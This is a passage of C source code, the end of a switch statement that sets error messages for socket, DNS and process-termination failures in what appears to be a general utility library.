    case COM_UNIV_ERR_INET_SOCK_HTTP_RECV: com_err_set_sc(err_inf,code,"[com_univ_inet_sock_http()] Unable to receive data from the Internet server.\n"); break;
    case COM_UNIV_ERR_INET_SOCK_DNS_WSASTARTUP: com_err_set_sc(err_inf,code,"[com_univ_inet_sock_dns()] Unable to initialize Windows sockets.\n"); break;
    case COM_UNIV_ERR_INET_SOCK_DNS_SOCKET: com_err_set_sc(err_inf,code,"[com_univ_inet_sock_dns()] Unable to create UDP socket.\n"); break;
    case COM_UNIV_ERR_INET_SOCK_DNS_SENDTO: com_err_set_sc(err_inf,code,"[com_univ_inet_sock_dns()] Unable to send data to the Internet server.\n"); break;
    case COM_UNIV_ERR_INET_SOCK_DNS_SELECT: com_err_set_sc(err_inf,code,"[com_univ_inet_sock_dns()] Unable to wait for the data from the Internet server.\n"); break;
    case COM_UNIV_ERR_INET_SOCK_DNS_RECVFROM: com_err_set_sc(err_inf,code,"[com_univ_inet_sock_dns()] Unable to receive data from the Internet server.\n"); break;
    case COM_UNIV_ERR_TERMINATE_PROCESS_TERMINATE_PROCESS: com_err_set_sc(err_inf,code,"[com_univ_terminate_process()] Unable to terminate process.\n"); break;
  }
  return;
}
